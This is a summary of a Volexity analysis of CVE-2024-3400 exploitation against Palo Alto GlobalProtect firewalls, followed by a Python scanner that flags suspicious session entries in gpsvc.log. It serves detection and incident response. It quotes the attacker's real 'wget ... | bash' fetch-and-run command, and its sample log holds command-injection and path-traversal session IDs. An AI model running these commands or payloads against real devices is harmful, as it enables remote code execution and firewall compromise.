Volexity analyzes CVE-2024-3400 exploitation against Palo Alto Networks GlobalProtect devices, detailing detection approaches, log-based indicators, and memory-forensics findings. The write-up attributes the activity to a threat actor tracked as UTA0218 and outlines reactive and proactive strategies to detect edge-device compromises.
Read more: https://www.volexity.com/blog/2024/05/15/detecting-compromise-of-cve-2024-3400-on-palo-alto-networks-globalprotect-devices/
Keypoints
- CVEs: CVE-2024-3400 was exploited in the GlobalProtect component of PAN-OS during in-the-wild attacks.
- Exfiltration of the firewall’s running configuration emerged as the most common post-exploitation activity across many organizations and regions.
- Early exploitation involved simple commands to place zero-byte files as a validation step for vulnerable devices.
- An uptick in exploitation followed the advisory release and was associated with UTA0218 or other actors who had early access to the exploit.
- Detection hinges on TSF/log analyses (gpsvc.log, md_out.log, device_telemetry_send.log, syslog-system.log, mp-monitor.log) and memory forensics.
- Memory-based indicators revealed artifacts such as base64/bash usage, suspicious binaries (/tmp/vpn_prot, /tmp/lowdp), and recovered bash history.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – CVE-2024-3400 was exploited in the GlobalProtect feature of PAN-OS to execute code remotely. “zero-day, in-the-wild exploitation of CVE-2024-3400 in the GlobalProtect feature of Palo Alto Networks PAN-OS by a threat actor … UTA0218.”
- [T1041] Exfiltration – Exfiltration of the firewall’s running configuration was the most commonly observed post-exploitation activity across devices. “Exfiltration of the firewall’s running configuration was the most commonly observed post-exploitation activity.”
- [T1059.004] Unix Shell – Use of base64 and bash during command execution and payload weaponization. “base64, bash, or echo” as malicious command keywords.
- [T1105] Ingress Tool Transfer – Downloading of additional payloads via wget and related commands observed in logs. “wget -qO- http://172.233.228.93/policy | bash”
- [T1053.005] Scheduled Task/Job – Persistence via cron.d scripts used to fetch and execute payloads. “cron.d script for persistence and downloading of additional payloads via wget.”
- [T1059.001] Command and Scripting Interpreter – Bash-based execution and scripted command chains observed in memory and logs. “bash” and related command sequences observed in multiple log entries.
Indicators of Compromise
- [IP] 172.233.228.93 – used to fetch policy and engage in post-exploitation communications (e.g., http://172.233.228.93/policy, 172.233.228.93:8443)
- [File] /tmp/vpn_prot, /tmp/lowdp – suspicious binaries observed in memory and on disk during investigations
- [Process] wget, bash – processes seen in cron-driven or scripted download/payload execution
- [Log/Entry] unmarshal session entries in gpsvc.log with path traversal and command-injection patterns (e.g., …unmarshal session(.././../…/opt/panlogs/tmp/device_telemetry/…); map , EOF)
- [File] update script and related cron-based persistence artifacts recovered from disk
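As an added example (not code from Volexity's post or from Palo Alto Networks), the following Python scanner illustrates the log-based detection summarised in the keypoints and indicators above: it reads gpsvc.log text, extracts the session ID from each "unmarshal session(...)" error, and flags IDs that contain path traversal, the /opt/panlogs/tmp/device_telemetry path, shell metacharacters, or the base64/bash/echo keywords the write-up names. The log line layout and every sample entry are constructed assumptions; a real gpsvc.log may format entries differently, so the session regex is the part to adapt first.

```python
import re
from dataclasses import dataclass

# Constructed sample gpsvc.log lines (assumed layout, not from any real device).
# Only the "unmarshal session(...)" entries carry an attacker-controlled SESSID field.
SAMPLE_GPSVC_LOG = """\
04/12/24 10:00:01 gpsvc: connecting session from 203.0.113.5
04/12/24 10:00:02 gpsvc: failed to unmarshal session(../../../../opt/panlogs/tmp/device_telemetry/minute/ping); map , EOF
04/12/24 10:00:03 gpsvc: failed to unmarshal session(`echo cHdkCg== | base64 -d | bash`); map , EOF
04/12/24 10:00:04 gpsvc: failed to unmarshal session(abc123); map , EOF
04/12/24 10:00:05 gpsvc: failed to unmarshal session(/opt/panlogs/tmp/device_telemetry/hour/test); map , EOF
"""

# Session ID as written back into the error message; non-greedy up to the closing ");"
SESSION_RE = re.compile(r"unmarshal session\((?P<sessid>.*?)\);")
# Directory traversal fragments such as "../" or ".././"
TRAVERSAL_RE = re.compile(r"\.\./")
# The telemetry directory the write-up associates with the traversal payloads
TELEMETRY_DIR = "/opt/panlogs/tmp/device_telemetry"
# Characters that have no business in a benign session ID but drive shell injection
SHELL_META_RE = re.compile(r"[`|;&]|\$\(")
# Command keywords the write-up flags as malicious inside session entries
KEYWORDS = ("base64", "bash", "echo", "wget", "curl")


@dataclass
class Finding:
    line_no: int      # 1-based line number within the scanned text
    sessid: str       # the raw session ID recovered from the log entry
    reasons: list[str]  # which heuristics fired, in a fixed order


def classify_sessid(sessid: str) -> list[str]:
    """Return the list of detection reasons for one session ID (empty if benign)."""
    reasons: list[str] = []
    if TRAVERSAL_RE.search(sessid):
        reasons.append("path-traversal")
    if TELEMETRY_DIR in sessid:
        reasons.append("device-telemetry-path")
    if SHELL_META_RE.search(sessid):
        reasons.append("shell-metacharacter")
    hits = [k for k in KEYWORDS if re.search(rf"\b{k}\b", sessid, re.IGNORECASE)]
    if hits:
        reasons.append("keyword:" + ",".join(hits))
    return reasons


def scan_gpsvc_log(text: str) -> list[Finding]:
    """Scan gpsvc.log text and return a Finding for every suspicious unmarshal entry."""
    findings: list[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        match = SESSION_RE.search(line)
        if match is None:
            continue  # not an unmarshal-session error; nothing attacker-controlled here
        sessid = match.group("sessid")
        reasons = classify_sessid(sessid)
        if reasons:
            findings.append(Finding(line_no, sessid, reasons))
    return findings


def summarize(findings: list[Finding]) -> dict[str, int]:
    """Count how often each heuristic fired, for a quick triage view."""
    counts: dict[str, int] = {}
    for f in findings:
        for r in f.reasons:
            key = r.split(":", 1)[0]  # collapse "keyword:base64,bash" to "keyword"
            counts[key] = counts.get(key, 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan_gpsvc_log(SAMPLE_GPSVC_LOG):
        print(f"line {f.line_no}: {', '.join(f.reasons)} :: {f.sessid}")
    print(summarize(scan_gpsvc_log(SAMPLE_GPSVC_LOG)))
```

Run it against an exported gpsvc.log (or the copy inside a tech support file) by replacing SAMPLE_GPSVC_LOG with the file contents. The traversal and telemetry-path checks catch the zero-byte-file validation stage described in the keypoints, while the metacharacter and keyword checks catch the later command-execution stage; keeping them as separate reasons makes it easy to see which stage a device reached.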